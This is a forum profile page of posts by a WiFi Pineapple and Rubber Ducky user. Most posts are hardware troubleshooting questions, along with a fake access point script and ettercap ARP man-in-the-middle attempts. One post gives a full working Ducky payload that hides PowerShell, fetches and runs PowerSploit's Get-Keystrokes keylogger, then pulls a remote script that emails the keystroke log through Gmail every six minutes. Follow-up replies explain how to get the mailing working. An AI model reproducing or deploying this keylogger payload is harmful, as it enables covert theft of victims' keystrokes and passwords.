-
Posts
14 -
Joined
-
Last visited
Posts posted by Speed09
-
-
39 minutes ago, Mike Jamieson said:
well I finally got it to work using the original script from Speed09! I'm ecstatic. I changed my web hosting to a free shared account (https://www.000webhost.com/) and it worked, I'm also noticing that I'm receiving results from hours ago which makes me believe it was working all along. Gmail was blocking the sign in from the script because it was viewed as a less secure app, and I finally got a notification to allow the sign in attempt.
I'm noticing that the results appear in single character results which makes it very difficult to actually comprehend what is being typed. Do you use any tools to organize the results?
Thank you so much for the help!! Just know you made someone's day and helped ignite my interest in security.
Yeah I forgot to mention that you'll have to turn on less secure app settings.
For the results, it doesn't bother me much to view the results one character at a time. But if you want to view it online, feel free to change the script :)
-
5 minutes ago, Mike Jamieson said:
Thank you. One last question, How would you disable this script?
By simply shutting down the computer. Since the script is loaded in memory, I also think that logout should kill it. Have a try!
-
29 minutes ago, Mike Jamieson said:
How often will the results of the keylogger be sent to your email?
Every 360sec. But you can change it.
-
I'm not good at powershell at all, but I managed to get the exfiltrate working.
I simply modified the payload to run a ps script from my server that will send me the log file via email.
Here is the final ducky script:
DELAY 2000 GUI r DELAY 500 STRING powershell -WindowStyle hidden ENTER DELAY 1500 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 400 STRING Get-Keystrokes -LogPath $env:temp\key.txt ENTER DELAY 200 GUI r DELAY 300 STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://yourserver/mail.ps1') ENTER
And here is the mail.ps1 content:
$SMTPServer = 'smtp.gmail.com' $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) $SMTPInfo.EnableSsl = $true $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('youradress@gmail.com', 'yourpass') $ReportEmail = New-Object System.Net.Mail.MailMessage $ReportEmail.From = 'youradress@gmail.com' $ReportEmail.To.Add('youradress@gmail.com') $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}
- 1
-
Nice script! I will give it a try. But to exfiltrate the log file you can make a simple ps script that email (or POST to a web server) every X minutes the content of the file. I'm not good at ps but I think it's possible.
-
Hello everyone,
I just finished to configure Kismet to do some tests on my Pineapple. Everything works just fine but I have a problem:
I don't find a way to block it to run on startup. I searched in the documentation, in all aff the configuration files but didn't find anything... I also added this command to the rc.local file, but that doesn't work:
killall kismet_server
Anyone have a solution? Thanks!
-
I finally reset my Pineapple and followed your instructions. Thanks it solved my problem :)
-
Hello everyone!
I'm currently trying to make the script "fakeAP" work on my Pineapple. This script simply creates a fake AP, I let you imagine what for.
The problem is: This script require Scapy to work. I tried to install it but when I run the setup script, It says that it can't find "distutils.core".
Distutils is used to install python package. I searched a way to install it but, when I try to install it (via OPKG or from source), it says:
* pkg_write_filelist: Failed to open //usr/lib/opkg/info/python-distutils.list: No space left on device. * opkg_install_pkg: Failed to extract data files for python-distutils. Package debris may remain! * opkg_install_cmd: Cannot install package python. * opkg_conf_write_status_files: Can't open status file //usr/lib/opkg/status: No space left on device.
So, my Pineapple don't have enough space left. I tried to tweak the opkg.conf so it can install it on my sd card (mounted on /sd) but it fails everytime.
I deleted a bunch of my modules and temp files, but the result is the same.
Has anyone a solution ?
Thanks and sorry for bad english! :)
-
Hello everyone!
I searched across the internet for a theme dedicated to the Pineapple interface, in vain... I only found the "NSA Theme" on this post.
So I was wondering if anyone here wanted to share his custom Pineapple Theme :D (I suck at css)
Thanks!
-
Hi guys!
I recently wanted to get interrested in deploying a MITM attack in my home network.
I firstly used SSLSplit and ettercap from the Pineapple Web Interface (which is a little bit buggy sometimes). From there, the attack worked 1/3 of the time. Then I tried to do this from the CLI. ettercap seems to work pretty well (ettercap -Tqi wlan1 -M arp:remote // //) but I didn't managed to get SSLStrip working... And if I try to run SSLStrip from the GUI, the certs are signed by "SSLStrip", which cause security warnings.
Is there a way to generate customs certs and pass them to the SSLStrip GUI?
Thanks!
PS: I observed that when the attack is going on, it's really slow to browse the internet... Is it normal? Sorry for my bad english
-
Oh ok i thought that my phone would supply enough power to boot the pineapple. Thanks for your clear answer :D
-
Hi guys!
It's been now a month that I'm using my Nano and I'm really happy about it!
But today I wanted to test the Nano with my phone. I plugged my portable Battery, plugged my phone and everything seems to work.
But now I have a question. Since my phone have a USB-C port and I have a USB-C OTG Cable. Why the Nano can't be powered only by using this cable? Did I really need to get my battery every time I want to use my Nano with my phone? Or have you another setup, more simple?
Thanks for your attention, have a nice day!
(PS: Sorry for bad english)
My Impressions and questions on Nano
in WiFi Pineapple NANO
Posted
Hi,
How did you managed to get bettercap running on your WPNano ? I thought the CPU was not enough powerfull to run it...